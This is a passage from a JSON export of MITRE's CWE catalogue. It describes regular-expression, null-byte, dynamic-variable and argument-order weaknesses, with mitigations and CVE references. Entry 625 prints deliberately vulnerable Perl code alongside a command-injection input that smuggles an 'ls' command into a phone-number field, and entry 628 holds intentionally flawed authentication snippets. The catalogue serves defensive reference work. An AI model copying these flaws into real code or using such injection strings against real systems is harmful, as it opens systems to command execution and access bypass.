under-reported.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Observed_Example, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples"}]}},"624":{"attr":{"@_ID":"624","@_Name":"Executable Regular Expression Error","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product uses a regular expression that either (1) contains an executable component with user-controlled inputs, or (2) allows a user to enable execution by inserting pattern modifiers.","Extended_Description":"Case (2) is possible in the PHP preg_replace() function, and possibly in other languages when a user-controlled input is inserted into a string that is later parsed as a regular expression.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"77","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"77","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"77","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Perl","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"The regular expression feature in some languages allows inputs to be quoted or escaped before insertion, such as \\\\Q and \\\\E in Perl."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-2059","Description":"Executable regexp in PHP by inserting \\"e\\" modifier into first argument to preg_replace","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2059"},{"Reference":"CVE-2005-3420","Description":"Executable regexp in PHP by inserting \\"e\\" modifier into first argument to preg_replace","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3420"},{"Reference":"CVE-2006-2878","Description":"Complex curly syntax inserted into the replacement argument to PHP preg_replace(), which uses the \\"/e\\" modifier","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2878"},{"Reference":"CVE-2006-2908","Description":"Function allows remote attackers to execute arbitrary PHP code via the username field, which is used in a preg_replace function call with a /e (executable) modifier.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2908"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}},"Notes":{"Note":{"#text":"Under-studied. The existing PHP reports are limited to highly skilled researchers, but there are few examples for other languages. It is suspected that this is under-reported for all languages. Usability factors might make it more prevalent in PHP, but this theory has not been investigated.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Observed_Example"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"625":{"attr":{"@_ID":"625","@_Name":"Permissive Regular Expression","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses a regular expression that does not sufficiently restrict the set of allowed values.","Extended_Description":{"xhtml:p":"This effectively causes the regexp to accept substrings that match the pattern, which produces a partial comparison to the target. In some cases, this can lead to other weaknesses. Common errors include:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["not identifying the beginning and end of the target string","using wildcards instead of acceptable character ranges","others"]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"185","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"187","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"184","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"183","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Perl","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"This problem is frequently found when the regular expression is used in input validation or security features such as authentication."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"When applicable, ensure that the regular expression marks beginning and ending string patterns, such as \\"/^string$/\\" for Perl."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-37"},"Intro_Text":"The following code takes phone numbers as input, and uses a regular expression to reject invalid phone numbers.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$phone = GetPhoneNumber();if ($phone =~ /\\\\d+-\\\\d+/) {}else {}","xhtml:br":["",""],"xhtml:div":[{"#text":"system(\\"lookup-phone $phone\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:i":"# looks like it only has hyphens and digits","xhtml:br":""},{"#text":"error(\\"malformed number!\\");","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"An attacker could provide an argument such as: \\"; ls -l ; echo 123-456\\" This would pass the check, since \\"123-456\\" is sufficient to match the \\"\\\\d+-\\\\d+\\" portion of the regular expression."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-1895","Description":"\\".*\\" regexp leads to static code injection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1895"},{"Reference":"CVE-2002-2175","Description":"insertion of username into regexp results in partial comparison, causing wrong database entry to be updated when one username is a substring of another.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2175"},{"Reference":"CVE-2006-4527","Description":"regexp intended to verify that all characters are legal, only checks that at least one is legal, enabling file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4527"},{"Reference":"CVE-2005-1949","Description":"Regexp for IP address isn\'t anchored at the end, allowing appending of shell metacharacters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1949"},{"Reference":"CVE-2002-2109","Description":"Regexp isn\'t \\"anchored\\" to the beginning or end, which allows spoofed values that have trusted values as substrings.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2109"},{"Reference":"CVE-2006-6511","Description":"regexp in .htaccess file allows access of files whose names contain certain substrings","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6511"},{"Reference":"CVE-2006-6629","Description":"allow load of macro files whose names contain certain substrings.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6629"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS08-J","Entry_Name":"Sanitize untrusted data passed to a regex"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;Character Stripping Vulnerabilities&#34;, Page 437"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Description, Relationships, Observed_Example, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Modes_of_Introduction, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"626":{"attr":{"@_ID":"626","@_Name":"Null Byte Interaction Error (Poison Null Byte)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not properly handle null bytes or NUL characters when passing data between different representations or components.","Extended_Description":{"xhtml:p":["A null byte (NUL character) can have different meanings across representations or languages. For example, it is a string terminator in standard C libraries, but Perl and PHP strings do not treat it as a terminator. When two representations are crossed - such as when Perl or PHP invokes underlying C functionality - this can produce an interaction error with unexpected results. Similar issues have been reported for ASP. Other interpreters written in C might also be affected.","The poison null byte is frequently useful in path traversal attacks by terminating hard-coded extensions that are added to a filename. It can play a role in regular expression processing in PHP."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"147","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"436","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Perl","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"ASP.NET","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Remove null bytes from all incoming strings."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-4155","Description":"NUL byte bypasses PHP regular expression check","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4155"},{"Reference":"CVE-2005-3153","Description":"inserting SQL after a NUL byte bypasses allowlist regexp, enabling SQL injection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3153"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-514"}},{"attr":{"@_External_Reference_ID":"REF-515"}},{"attr":{"@_External_Reference_ID":"REF-516"}}]},"Notes":{"Note":[{"#text":"Current usage of \\"poison null byte\\" is typically related to this C/Perl/PHP interaction error, but the original term in 1998 was applied to an off-by-one buffer overflow involving a null byte.","attr":{"@_Type":"Terminology"}},{"#text":"There are not many CVE examples, because the poison NULL byte is a design limitation, which typically is not included in CVE by itself. It is typically used as a facilitator manipulation to widen the scope of potential attacks against other vulnerabilities.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Description, Relationships, Observed_Example, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes, Research_Gaps, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples, Relationships"}]}},"627":{"attr":{"@_ID":"627","@_Name":"Dynamic Variable Evaluation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"In a language where the user can influence the name of a variable at runtime, if the variable names are not controlled, an attacker can read or write to arbitrary variables, or access arbitrary functions.","Extended_Description":"The resultant vulnerabilities depend on the behavior of the application, both at the crossover point and in any control/data flow that is reachable by the related variables or functions.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"914","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"183","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Perl","@_Prevalence":"Undetermined"}}]},"Background_Details":{"Background_Detail":"Many interpreted languages support the use of a \\"$$varname\\" construct to set a variable whose name is specified by the $varname variable. In PHP, these are referred to as \\"variable variables.\\" Functions might also be invoked using similar syntax, such as $$funcname(arg1, arg2)."},"Alternate_Terms":{"Alternate_Term":{"Term":"Dynamic evaluation"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Modify Application Data","Execute Unauthorized Code or Commands"],"Note":"An attacker could gain unauthorized access to internal program variables and execute arbitrary code."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Strategy":"Refactoring","Description":"Refactor the code to avoid dynamic variable evaluation whenever possible."},{"Phase":"Implementation","Strategy":"Input Validation","Description":"Use only allowlists of acceptable variable or function names."},{"Phase":"Implementation","Description":"For function names, ensure that you are only calling functions that accept the proper number of arguments, to avoid unexpected null arguments."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-0422","Description":"Chain: Dynamic variable evaluation allows resultant remote file inclusion and path traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0422"},{"Reference":"CVE-2007-2431","Description":"Chain: dynamic variable evaluation in PHP program used to modify critical, unexpected $_SERVER variable for resultant XSS.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2431"},{"Reference":"CVE-2006-4904","Description":"Chain: dynamic variable evaluation in PHP program used to conduct remote file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4904"},{"Reference":"CVE-2006-4019","Description":"Dynamic variable evaluation in mail program allows reading and modifying attachments and preferences of other users.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4019"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-517"}},{"attr":{"@_External_Reference_ID":"REF-518"}}]},"Notes":{"Note":{"#text":"Under-studied, probably under-reported. Few researchers look for this issue; most public reports are for PHP, although other languages are affected. This issue is likely to grow in PHP as developers begin to implement functionality in place of register_globals.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Background_Details, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Common_Consequences, Observed_Examples, Potential_Mitigations, Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}]}},"628":{"attr":{"@_ID":"628","@_Name":"Function Call with Incorrectly Specified Arguments","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product calls a function, procedure, or routine with arguments that are not correctly specified, leading to always-incorrect behavior and resultant weaknesses.","Extended_Description":{"xhtml:p":"There are multiple ways in which this weakness can be introduced, including:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["the wrong variable or reference;","an incorrect number of arguments;","incorrect order of arguments;","wrong type of arguments; or","wrong value."]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary","Description":"This is usually primary to other weaknesses, but it can be resultant if the function\'s API or function prototype changes."}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Other","Access Control"],"Impact":["Quality Degradation","Gain Privileges or Assume Identity"],"Note":"This weakness can cause unintended behavior and can lead to additional weaknesses such as allowing an attacker to gain unintended access to system resources."}},"Detection_Methods":{"Detection_Method":{"Method":"Other","Description":"Since these bugs typically introduce incorrect behavior that is obvious to users, they are found quickly, unless they occur in rarely-tested code paths. Managing the correct number of arguments can be made more difficult in cases where format strings are used, or when variable numbers of arguments are supported."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Build and Compilation","Description":"Once found, these issues are easy to fix. Use code inspection tools and relevant compiler features to identify potential violations. Pay special attention to code that is not likely to be exercised heavily during QA."},{"Phase":"Architecture and Design","Description":"Make sure your API\'s are stable before you use them in production code."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-62"},"Intro_Text":"The following PHP method authenticates a user given a username/password combination but is called with the parameters in reverse order.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function authenticate($username, $password) {}authenticate($_POST[\'password\'], $_POST[\'username\']);","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["",""],"xhtml:i":"// authenticate user"}},"xhtml:br":["",""]}}},{"attr":{"@_Demonstrative_Example_ID":"DX-63"},"Intro_Text":"This Perl code intends to record whether a user authenticated successfully or not, and to exit if the user fails to authenticate. However, when it calls ReportAuth(), the third argument is specified as 0 instead of 1, so it does not exit.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"sub ReportAuth {}sub PrivilegedFunc{}","xhtml:div":[{"#text":"my ($username, $result, $fatal) = @_;PrintLog(\\"auth: username=%s, result=%d\\", $username, $result);if (($result ne \\"success\\") &amp;&amp; $fatal) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"die \\"Failed!\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}},{"#text":"my $result = CheckAuth($username);ReportAuth($username, $result, 0);DoReallyImportantStuff();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":["","",""]}}},{"attr":{"@_Demonstrative_Example_ID":"DX-64"},"Intro_Text":"In the following Java snippet, the accessGranted() method is accidentally called with the static ADMIN_ROLES array rather than the user roles.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private static final String[] ADMIN_ROLES = ...;public boolean void accessGranted(String resource, String user) {}private boolean void accessGranted(String resource, String[] userRoles) {}","xhtml:br":["","",""],"xhtml:div":[{"#text":"String[] userRoles = getUserRoles(user);return accessGranted(resource, ADMIN_ROLES);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["",""],"xhtml:i":"// grant or deny access based on user roles"}}]}}}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2006-7049","Description":"The method calls the functions with the wrong argument order, which allows remote attackers to bypass intended access restrictions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7049"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"DCL10-C","Entry_Name":"Maintain the contract between the writer and caller of variadic functions"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP37-C","Entry_Name":"Call functions with the correct number and type of arguments","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"DCL00-PL","Entry_Name":"Do not use subroutine prototypes","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP33-PL","Entry_Name":"Do not invoke a function in a context for which it is not defined","Mapping_Fit":"Imprecise"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Detection_Factors, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Detection_Factors, Relationships"}],"Previous_Entry_Name":{"#text":"Incorrectly Specified Arguments","attr":{"@_Date":"2008-04-11"}}}},"636":{"attr":{"@_ID":"636","@_Name":"Not Failing Securely (\'Failing Open\')","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"When the product encounters an error condition or failure, its design requires it to fall back to a state that is less secure than other options that are available, such as selecting the weakest encryption algorithm or using the most permissive access control restrictions.","Extended_Description":"By entering a less secure state, the product inherits the weaknesses associated with that state, making it easier to compromise. At the least, it causes administrators to have a false sense of security. This weakness typically occurs as a result of wanting to \\"fail functional\\" to minimize administration and support costs, instead of \\"failing 